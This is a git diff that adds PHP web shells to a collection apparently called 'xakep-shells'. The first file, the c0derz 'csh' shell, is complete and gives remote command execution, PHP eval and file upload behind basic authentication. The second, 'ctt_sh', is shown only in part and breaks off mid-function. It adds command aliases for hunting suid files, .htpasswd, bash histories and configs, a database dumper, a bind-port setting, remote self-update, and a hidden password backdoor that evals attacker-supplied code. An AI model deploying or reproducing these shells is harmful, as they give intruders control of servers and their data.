@@ -0,0 +1,334 @@
+<?php
+/****************************************************************
+*
+*	.::[csh]::. //(.::[c0derz]::. web-shell) v. 0.1.1 release
+*			 ----------------------------
+*       c0ded by: [vINT 21h]
+*       URL: http://c0derz.org.ua
+*       e-mail: vint21h@c0derz.org.ua
+*       ICQ: 255577736
+*
+****************************************************************/
+
+/***************************************************************
+ *
+ *   This program is free software; you can redistribute it and/or modify
+ *   it under the terms of the GNU General Public License as published by
+ *   the Free Software Foundation; either version 2 of the License', or
+ *   ('at your option) any later version.
+ *
+ ****************************************************************/
+
+
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$achtung=1;
+//authentification
+$authentification = 1;
+$name='63a9f0ea7bb98050796b649e85481845';//root
+$pass='5cdbe638246729485a5eab6b93f170e2';//c0derz
+$caption="Enter your login and password";
+if ($authentification &&  (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || md5($HTTP_SERVER_VARS['PHP_AUTH_USER'])!=$name || md5($HTTP_SERVER_VARS['PHP_AUTH_PW'])!=$pass))
+{
+    header("WWW-Authenticate: Basic realm=\"$caption\"");
+    header("HTTP/1.0 401 Unauthorized");
+    exit("<BODY text=#000000 vLink=#000000 aLink=#000000 link=#000000 bgcolor=#888888><h1>Error 401</h1><h2>Unauthorized access!</h2>");
+}
+if($achtung)
+  error_reporting(E_ALL&~E_NOTICE);
+else
+  error_reporting(0);
+  //---------------------
+
+//get page generating time
+if (!function_exists("get_micro_time")) {
+ function get_micro_time() {
+  list($usec, $sec) = explode(" ", microtime());
+  return ((float)$usec + (float)$sec);
+ }
+}
+define("start_time",get_micro_time());
+$cshver="<a href=http://c0derz.org.ua target='_BLANK' title='.::[c0derz shell]::.'><b>.::[csh]::.</b></a> v. 0.1.1 release";
+ //-------------------------------
+
+ //normalize text encoding
+ function decode($buffer){
+return  convert_cyr_string ($buffer, 'd', 'w');
+}
+//---------------------------------
+
+?>
+
+<HTML>
+<HEAD>
+<meta http-equiv='pragma' content='no-cache'>
+
+<?php
+echo "<TITLE>.:[csh]:.| [".get_current_user()."@".$SERVER_NAME."]</TITLE>";
+?>
+
+<STYLE>
+BODY{scrollbar-base-color: 000000;
+          scrollbar-face-color: #aaaaaa;
+          scrollbar-highlight-color: #dddddd;
+          scrollbar-shadow-color: #544554;
+          scrollbar-dark-shadow-color: #111111;
+          scrollbar-track-color: #222222;
+          scrollbar-arrow-color: #dcdddc}
+
+a:visited { color: #dcdcdc; text-decoration: none}
+A:active { color: #dcdcdc; text-decoration: none; }
+a:link {  color: #dcdcdc; text-decoration: none}
+a:hover {  color: #ff3333; text-decoration: none}
+
+BODY {
+scrollbar-face-color: transparent;
+scrollbar-shadow-color: transparent;
+scrollbar-highlight-color: transparent;
+scrollbar-3dlight-color: transparent;
+scrollbar-darkshadow-color: transparent;
+scrollbar-track-color: #777777;
+scrollbar-arrow-color: #777777;
+}
+</STYLE>
+</HEAD>
+<BODY text=#000000 vLink=#000000 aLink=#000000 link=#000000 bgcolor=#888888>
+<DIV align=center>
+<TABLE bordercolor=#000000 cellSpacing=1 width=950 bgColor=#000000 border=0 height=600>
+<hr>
+<table width=950>
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="677667">
+<font size="1" face="verdana" color="#000000">
+<left>
+ <table width=100%>
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="555555" >
+  <font size="1" face="verdana" color="#000000">
+
+<?php
+echo "<font size=1 face=verdana color=fcfcfc><b>Server info:</b></font><br>";
+?>
+
+ </td>
+ </tr>
+ </table>
+
+<?php
+//server info
+echo "Server name: <b><font color=#dcdcdc>".$SERVER_NAME."</b></font><br>";
+echo "Server IP adress:<b><font color=#dcdcdc>".$server_ip=gethostbyname($SERVER_NAME)."</b></font> <br>";
+echo (($safe_mode)?("Safe Mode: <font color=#ffffff><b>ON</b></font><br> "):
+         ("Safe Mode: <font color=#555555><b>OFF</b></font><br> "));
+echo "OS: <font color=#dcdcdc>";
+ if (empty($uname)){
+  echo (php_uname()."</font><br>");
+ }else
+  echo $uname."</font><br>";
+  echo 'User: <font color=#dcdcdc>' .get_current_user() . '</font><br>';
+   echo "HTTP Server: <font color=#dcdcdc>".$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE']."</font><br>";
+ echo ("PHP: <font color=#dcdcdc>".phpversion()."</font><br> ");
+  echo ("MySQL: ");
+ if($mysql_stat=function_exists('mysql_connect')){
+  echo "<font color=#ffffff><b>ON</b> </font><b>";
+ }
+ else {
+  echo "<font color=#555555><b>OFF</b> </font><br>";
+ }
+ //---------------------------
+ ?>
+
+ </td>
+ </tr>
+ </table>
+<tr>
+<td width="100" bgcolor="555555" valign="top">
+<center>
+<font face="tahoma" size="1" color="#000000"><div align="center"><b>.::[Shell functions]::.</b></div></font>
+<font style="font: 11px/14px verdana, arial, sans-serif; color: #554455;">
+<table width=100%>
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="888888" onmouseover="this.style.backgroundColor='#677667';" onmouseout="this.style.backgroundColor='#888888';">
+ <font style="font: 11px/14px verdana, arial, sans-serif; color: #554455;">
+<a href="<?php echo $PHP_SELF."?mode=shell"?>" title="./$shell"><b>./ $shell</b></a><br>
+</td>
+ </tr>
+ </table>
+<table width=100%>
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="677667" onmouseover="this.style.backgroundColor='#888888';" onmouseout="this.style.backgroundColor='#677667';">
+ <font style="font: 11px/14px verdana, arial, sans-serif; color: #554455;">
+<a href="<?php echo $PHP_SELF."?mode=phpcode"?>" title="PHP code execution">./php execution</a><br>
+</td>
+ </tr>
+ </table>
+ <table width=100%>
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="677667" onmouseover="this.style.backgroundColor='#888888';" onmouseout="this.style.backgroundColor='#677667';">
+ <font style="font: 11px/14px verdana, arial, sans-serif; color: #554455;">
+<a href="<?php echo $PHP_SELF."?mode=upload"?>" title="Upload file to server">./ upload file</a><br>
+</td>
+ </tr>
+ </table>
+</div>
+<br>
+<br>
+<br>
+<br>
+<br>
+<td bgcolor="555555" valign="top" >
+<center>
+<div style="margin-top: 5;">
+<table width="98%" cellpadding="1" cellspacing="0">
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="555555" >
+<font size="1" face="verdana" color="#fcfcfc">
+<b><?php echo$head_text;?><b>
+<tr>
+<td colspan="3" bgcolor="#677667" style="border-left: 1 solid #000000" style="border-bottom: 1 solid #000000" style="border-right: 1 solid #000000">
+<font face="Verdana" size="2" color="#000000">
+<br>
+<?php
+
+if (!empty($_GET['mode'])) {$mode = $_GET['mode'];}
+elseif (!empty($_POST['mode'])) {$mode = $_POST['mode'];}
+else {$mode = "shell";}
+
+switch($mode) {
+
+case "shell":
+$foot_stat="Current directory: <b><font color=#dcdcdc>[".getcwd()."]</font></b></tr>";
+$head_text="Shell:";
+chdir($dir);
+
+function execute($com)
+{
+
+ if (!empty($com))
+ {
+  if(function_exists('exec'))
+   {
+    exec($com,$arr);
+   echo implode('
+',$arr);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    echo shell_exec($com);
+   }
+  elseif(function_exists('system'))
+{
+    echo system($com);
+}
+  elseif(function_exists('passthru'))
+   {
+    echo passthru($com);
+   }
+}
+
+}
+if ($cmd){
+
+if($sertype == "winda"){
+ob_start();
+execute($cmd);
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+else{
+ob_start();
+echo decode(execute($cmd));
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+if (trim($buffer)){
+echo "<center><table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\">Executed command: <b><font color=#dcdcdc>[$cmd]</font></b></form></td></tr></table></center><left><textarea cols=200 rows=40 style=\"margin-left: 3; background-color: 555555; font-family: Tahoma; color: 000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\">";
+echo decode($buffer);
+echo "</textarea></center></div>";
+}
+}
+echo "<table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\">
+<form action=\"$REQUEST_URI\" method=\"POST\">
+<table><tr><td><font size=1 face=verdana color=000000>[".get_current_user()."@".$SERVER_NAME."]: </font><INPUT type=\"text\" name=\"cmd\" size=50 value=\"$cmd\" style=\"margin-left: 3; background-color: 555555; font-family: Tahoma; color: 000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></td></tr></table>
+<table><tr><td><font size=1 face=verdana color=000000>Current directory: </font><INPUT type=\"text\" name=\"dir\" size=50 value=\"";
+echo getcwd();
+echo "\"style=\"margin-left: 3; background-color: 555555; font-family: Tahoma; color: 000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\">
+<INPUT type=\"submit\" value=\"Change directory =>\" id=input style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></td></tr></table></form></td></tr></table>";
+break;
+case "phpcode":
+$head_text="PHP code execution:";
+echo "<center><table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\"><b>PHP code:</b></td></tr></table><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=200 rows=40 style=\"margin-left: 3; background-color: 555555; font-family: Tahoma; color: 000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></textarea><br><br>
+<input type=\"submit\" name=\"submit\" value=\"                                     Execute PHP code =>                                     \" id=input style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></form></center></div>";
+echo "<center><table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\"><center><b>Results of PHP execution:</b></center>";
+@eval(stripslashes($_POST['phpcode']));
+echo "</td></tr></table></center>";
+break;
+case "upload":
+echo"<table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\">
+<table>
+<font size=\"1\" face=\"verdana\" color=\"#000000\">
+<form enctype=\"multipart/form-data\" action=\"$self\" method=\"POST\">
+<input type=\"hidden\" name=\"mode\" value=\"upload\">
+<tr>
+<td><font size=\"1\" face=\"verdana\" color=\"#000000\">File:</font></td>
+<td><input size=\"48\" name=\"file\" type=\"file\" style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></td>
+</tr>
+<tr>
+<td><font size=\"1\" face=\"verdana\" color=\"#000000\">Path:</font></td>
+<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\" style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"><input type=\"submit\" value=\"Send\" style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></td></tr></form></font></table></td></tr></table>";
+if (isset($_POST['path'])){
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+echo"<table width=100%><tr><td style=\"border: 1 solid \"000000\" bgcolor=\"888888\"><font size=\"1\" face=\"verdana\" color=\"#000000\">";
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "File sucessfuly uploaded in to directory: <font color=ffffff>[$uploadfile]</font><br>";
+    echo "Name: <font color=ffffff>[".$_FILES['file']['name']. "]</font><br>";
+    echo "Size: <font color=ffffff>[" .$_FILES['file']['size']. "]</font> Bytes<br>";
+} else {
+    print "Couldn't to upload file. Information:<br>";
+    print_r($_FILES);
+}
+echo"</td></tr></table>";
+}
+break;
+}
+?>
+
+ </tr>
+  </td>
+ </tr>
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="555555" >
+<font size="1" face="verdana" color="#000000"><?echo $foot_stat;?>
+<tr>
+  <td style="border: none bgcolor="555555">
+<font size="1" face="verdana" color="#fcfcfc">
+<br>
+ <tr>
+<tr>
+  <td style="border: none bgcolor="555555">
+<font size="1" face="verdana" color="#fcfcfc">
+<br>
+ </tr>
+</table>
+</div>
+</td>
+</tr>
+</table>
+<table width=950>
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="677667" >
+<font size="1" face="verdana" color="#000000">
+<center>
+
+<?php
+echo "-=[".$cshver." | Page generation time: <font color=#fcfcfc>[<b>".round(get_micro_time()-start_time,4). "</b>]</font> seconds.]=-";
+?>
+
+ </td>
+ </tr>
+ </table>
+</BODY>
+</HTML>
\ No newline at end of file
diff --git a/xakep-shells/PHP/ctt_sh.php.php.txt b/xakep-shells/PHP/ctt_sh.php.php.txt
new file mode 100644
index 0000000..51ec008
--- /dev/null
+++ b/xakep-shells/PHP/ctt_sh.php.php.txt
@@ -0,0 +1,2927 @@
+<?php
+$timelimit = 60;
+$sul = "?";
+$rd = "./";
+$shver = "0.1";
+$login = "";
+$pass = "";
+$md5_pass = "";
+$login = false;
+$autoupdate = true;
+$updatenow = false;
+$autochmod = 755; 
+$filestealth = 1; 
+$donated_html = "";
+$donated_act = array("");
+$host_allow = array("*");
+$curdir = "./";
+$tmpdir = dirname(__FILE__); 
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"),
+ "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar")
+);
+$hexdump_lines = 8;
+$hexdump_rows = 24;
+$nixpwdperpage = 9999;
+$bindport_pass = "ctt";
+$bindport_port = "11457";
+$aliases = array();
+$aliases[] = array("-----------------------------------------------------------", "ls -la");
+$aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
+$aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
+$aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
+$aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
+$aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
+$aliases[] = array("find config* files", "find / -type f -name \"config*\"");
+ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
+$aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
+$aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
+$aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
+$aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
+$aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
+$aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
+$aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
+$aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
+$aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
+$aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
+$aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
+$aliases[] = array("show opened ports", "netstat -an | grep -i listen");
+$sess_method = "cookie";
+$sess_cookie = "ctshvars";
+if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));}
+$sess_file = $tmpdir."ctshvars_".$sid.".tmp";
+$usefsbuff = true;
+$copy_unset = false;
+$quicklaunch = array();
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$sul);
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$sul."act=ls&d=%upd");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">","");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$sul."act=fsbuff&d=%d");
+$quicklaunch1 = array();
+$quicklaunch1[] = array("<b>��������</b>",$sul."act=ps_aux&d=%d");
+$quicklaunch1[] = array("<b>������</b>",$sul."act=lsa&d=%d");
+$quicklaunch1[] = array("<b>�������</b>",$sul."act=cmd&d=%d");
+$quicklaunch1[] = array("<b>��������</b>",$sul."act=upload&d=%d");
+$quicklaunch1[] = array("<b>����</b>",$sul."act=sql&d=%d");
+$quicklaunch1[] = array("<b>PHP-���</b>",$sul."act=eval&d=%d");
+$quicklaunch1[] = array("<b>PHP-����</b>",$sul."act=phpinfo\" target=\"blank=\"_target");
+$quicklaunch1[] = array("<b>��� �������</b>",$sul."act=selfremove");
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+@$f = $_GET[f];
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+error_reporting(5);
+@ignore_user_abort(true);
+@set_magic_quotes_runtime(0);
+@set_time_limit(0);
+if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
+if(!ini_get("register_globals")) {import_request_variables("GPC");}
+$starttime = getmicrotime();
+if (get_magic_quotes_gpc())
+{
+if (!function_exists("strips"))
+{
+ function strips(&$el)
+ {
+  if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}}  }
+  else {$el = stripslashes($el);}
+ }
+}
+strips($GLOBALS);
+}
+$tmp = array();
+foreach ($host_allow as $k=>$v) {$tmp[]=  str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+
+
+if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);}
+elseif(empty($md5_pass)) {$md5_pass = md5($pass);}
+if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))
+{
+ header("WWW-Authenticate: Basic realm=\"CTT SHELL\"");
+ header("HTTP/1.0 401 Unauthorized");if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
+ exit;
+}  
+
+$lastdir = realpath(".");
+chdir($curdir);
+
+if (($selfwrite) or ($updatenow))
+{
+ if ($selfwrite == "1") {$selfwrite = "ctshell.php";}
+ ctsh_getupdate();
+ $data = file_get_contents($ctsh_updatefurl);
+ $fp = fopen($data,"w");
+ fwrite($fp,$data);
+ fclose($fp);
+ exit;
+}
+if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);}
+if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));}
+else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);}
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+$sess_data["copy"] = array_unique($sess_data["copy"]);
+$sess_data["cut"] = array_unique($sess_data["cut"]);
+
+if (!function_exists("ct_sess_put"))
+{
+function ct_sess_put($data)
+{
+ global $sess_method;
+ global $sess_cookie;
+ global $sess_file;
+ global $sess_data;
+ $sess_data = $data;
+ $data = serialize($data);
+ if ($sess_method == "file")
+ {
+  $fp = fopen($sess_file,"w");
+  fwrite($fp,$data);
+  fclose($fp);
+ }
+ else {setcookie($sess_cookie,$data);}
+}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len) 
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0, $len)."...".substr($content, -$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);}
+if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (!is_dir($t)) {mkdir($t);}
+ if (is_dir($d))
+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+
+  return copy($d,$t);
+ }
+ else {return false;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ error_reporting(9999);
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+$ret = true;
+if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}}
+if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (is_dir($d))
+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d)) {return rename($d,$t);}
+ else {return false;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+if (!is_dir($d.$o)) {unlink($d.$o);}
+else {fs_rmdir($d.$o."/"); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\","/",$o);
+ if (is_dir($o))
+ {
+  if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return false;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+ function myshellexec($cmd)
+ {
+  return system($cmd);
+ }
+}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner['read'] = ($mode & 00400) ? "r" : "-"; 
+ $owner['write'] = ($mode & 00200) ? "w" : "-"; 
+ $owner['execute'] = ($mode & 00100) ? "x" : "-"; 
+ $group['read'] = ($mode & 00040) ? "r" : "-"; 
+ $group['write'] = ($mode & 00020) ? "w" : "-"; 
+ $group['execute'] = ($mode & 00010) ? "x" : "-"; 
+ $world['read'] = ($mode & 00004) ? "r" : "-"; 
+ $world['write'] = ($mode & 00002) ? "w" : "-"; 
+ $world['execute'] = ($mode & 00001) ? "x" : "-"; 
+
+ if( $mode & 0x800 ) {$owner['execute'] = ($owner[execute]=="x") ? "s" : "S";}
+ if( $mode & 0x400 ) {$group['execute'] = ($group[execute]=="x") ? "s" : "S";}
+ if( $mode & 0x200 ) {$world['execute'] = ($world[execute]=="x") ? "t" : "T";}
+ 
+ return $type.$owner['read'].$owner['write'].$owner['execute'].
+  $group['read'].$group['write'].$group['execute'].
+  $world['read'].$world['write'].$world['execute'];
+}
+}
+if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}}
+if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}}
+if (!function_exists("ctsh_getupdate"))
+{
+function ctsh_getupdate()
+{
+ global $updatenow;
+ $data = @file_get_contents($ctsh_updatefurl);
+ if (!$data) {echo "Can't fetch update-information!";}
+ else
+ {
+  $data = unserialize(base64_decode($data));
+  if (!is_array($data)) {echo "Corrupted update-information!";}
+  else
+  {
+if ($cv < $data[cur]) {$updatenow = true;}
+  }
+ }
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = true;}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (empty($file))
+ {
+  global $win;
+  if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+  else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (sizeof($tabs) == 0)
+ {
+
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ global $SERVER_ADDR;
+ global $SERVER_NAME;
+ $out = "# Dumped by ctShell.SQL v. ".$cv."
+# Home page: http://.ru
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."
+# Date: ".date("d.m.Y H:i:s")."
+# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+if (!$res) {$ret[err][] = mysql_error();}
+else
+{
+ $row = mysql_fetch_row($res);
+ $out .= $row[1].";\n\n";
+ $res = mysql_query("SELECT * FROM `$tab`", $sock);
+ if (mysql_num_rows($res) > 0)
+ {
+  while ($row = mysql_fetch_assoc($res))
+  {
+$keys = implode("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+$values = implode("', '", $values); 
+$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+$out .= $sql;
+  } 
+ }
+}
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret[err][] = 2;}
+  else
+  {
+fwrite ($fp, $out);
+fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $ret;
+}
+}
+if (!function_exists("ctfsearch"))
+{
+function ctfsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $a;
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $handle = opendir($d);
+ while ($f = readdir($handle))
+ {
+  $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f));
+  if($f != "." && $f != "..")
+  {
+if (is_dir($d.$f))
+{
+ if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;}
+ ctfsearch($d.$f);
+}
+else
+{
+ if ($true)
+ {
+  if (!empty($a[text]))
+  {
+$r = @file_get_contents($d.$f);
+if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";}
+if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);}
+ 
+if ($a[text_regexp]) {$true = ereg($a[text],$r);}
+else {$true = strinstr($a[text],$r);}
+if ($a[text_not])
+{
